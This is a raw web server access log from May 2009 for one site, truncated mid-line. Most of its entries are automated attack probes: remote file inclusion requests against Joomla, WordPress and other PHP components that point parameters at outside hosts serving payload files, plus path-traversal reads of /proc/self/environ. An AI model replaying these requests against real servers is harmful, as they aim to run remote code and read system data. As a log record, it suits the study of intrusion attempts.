91.202.4.158 - - [05/May/2009:11:37:17 -0700] "GET /logs/access_080918.log/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:17 -0700] "GET /errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:17 -0700] "GET /logs/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:17 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:17 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:17 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:18 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:18 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:18 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:24 -0700] "GET /logs/access_080917.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:24 -0700] "GET /logs/access_080917.log/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:25 -0700] "GET /logs/access_080917.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:11:37:25 -0700] "GET /logs/access_080917.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:37:27 -0700] "GET /logs/access_080530.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:37:31 -0700] "GET /logs/access_071214.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:37:32 -0700] "GET /logs/access_080313.log//templates/mangobery/footer.sample.php?Site_Path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:38:18 -0700] "GET /logs/access_080418.log/index.php?page=&lang=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.184 - - [05/May/2009:11:38:34 -0700] "GET /main.php?appserv_root=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.184 - - [05/May/2009:11:38:34 -0700] "GET /logs//main.php?appserv_root=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.184 - - [05/May/2009:11:38:34 -0700] "GET /logs/access_090112.log//main.php?appserv_root=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.184 - - [05/May/2009:11:38:34 -0700] "GET /logs/access_081116.log//main.php?appserv_root=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:39:15 -0700] "GET /logs/access_080512.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:39:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:39:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:11:39:17 -0700] "GET /logs/access_080313.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:39:30 -0700] "GET /logs/access_090311.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:39:30 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:39:38 -0700] "GET /logs/access_071214.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:39:44 -0700] "GET /logs/access_090312.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:39:47 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:11:39:54 -0700] "GET /logs/access_080801.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:11:39:59 -0700] "GET /logs/access_080123.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:40:03 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:40:29 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 200 43031 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:41:25 -0700] "GET /logs/access_090311.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:41:26 -0700] "GET /logs/access_090312.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:41:33 -0700] "GET /logs/access_080512.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:41:35 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:41:35 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:41:35 -0700] "GET /logs/access_080806.log%20%20/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.107.130 - - [05/May/2009:11:41:43 -0700] "GET /logs/access_090122.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.52.107.130 - - [05/May/2009:11:41:43 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.52.107.130 - - [05/May/2009:11:41:44 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.52.107.130 - - [05/May/2009:11:41:48 -0700] "GET /logs/access_080130.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:11:41:55 -0700] "GET /logs/access_071214.log//main.php?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:42:03 -0700] "GET /logs/access_080110.log%20%20/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:15 -0700] "GET /logs///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:16 -0700] "GET /logs/access_080222.log///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:16 -0700] "GET //administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:21 -0700] "GET /logs/access_080222.log///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:21 -0700] "GET /logs///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:21 -0700] "GET //administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:27 -0700] "GET /logs/access_080925.log///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:11:42:28 -0700] "GET /logs/access_080331.log//main.php?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:42:38 -0700] "GET /logs/access_071212.log%20%20/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:42:40 -0700] "GET /logs/access_080111.log%20%20/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:40 -0700] "GET //administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:40 -0700] "GET /logs///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.107.130 - - [05/May/2009:11:42:40 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:40 -0700] "GET /logs/access_080222.log%20%20///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:42:46 -0700] "GET /logs/access_080925.log%20%20///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:43:14 -0700] "GET //administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:43:14 -0700] "GET /logs///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:43:14 -0700] "GET /logs/access_080222.log///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:43:16 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:43:16 -0700] "GET /logs/access_080130.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:43:16 -0700] "GET /logs/access_090122.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:43:16 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:43:19 -0700] "GET /logs/access_080925.log///administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:43:29 -0700] "GET /logs/access_071212.log%20%20/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:43:31 -0700] "GET /logs/access_080111.log%20%20/admin/spaw/spaw_control.class.php?spaw_root=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:11:43:58 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:11:43:58 -0700] "GET /logs/access_081118.log//config/dbutil.bck.php?confdir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:11:43:58 -0700] "GET /config/dbutil.bck.php?confdir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:11:43:59 -0700] "GET /config/dbutil.bck.php?confdir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:11:43:59 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:11:43:59 -0700] "GET /logs/access_081118.log//config/dbutil.bck.php?confdir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:11:44:03 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:11:44:04 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.66.227 - - [05/May/2009:11:44:13 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/rina212/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.227 - - [05/May/2009:11:44:13 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/rina212/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:44:34 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:44:34 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:44:34 -0700] "GET /logs/access_080806.log%20%20/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:44:41 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:44:41 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:44:41 -0700] "GET /logs/access_080806.log%20%20/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:44:44 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:44:44 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:44:48 -0700] "GET /logs/access_080927.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:44:48 -0700] "GET /logs/access_080801.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:44:53 -0700] "GET /logs/access_090122.log%20%20/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.85.6.98 - - [05/May/2009:11:44:53 -0700] "GET /logs/access_080130.log%20%20/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:45:00 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:45:00 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:45:01 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:45:01 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:45:01 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:45:01 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:45:02 -0700] "GET /logs/access_080110.log%20%20/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:45:04 -0700] "GET /logs/access_080110.log%20%20/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:45:08 -0700] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:45:09 -0700] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.226.30 - - [05/May/2009:11:45:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.226.30 - - [05/May/2009:11:45:28 -0700] "GET /logs/access_081118.log//config/dbutil.bck.php?confdir=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.226.30 - - [05/May/2009:11:45:28 -0700] "GET /config/dbutil.bck.php?confdir=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.226.30 - - [05/May/2009:11:45:30 -0700] "GET /config/dbutil.bck.php?confdir=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.226.30 - - [05/May/2009:11:45:30 -0700] "GET /logs//config/dbutil.bck.php?confdir=htt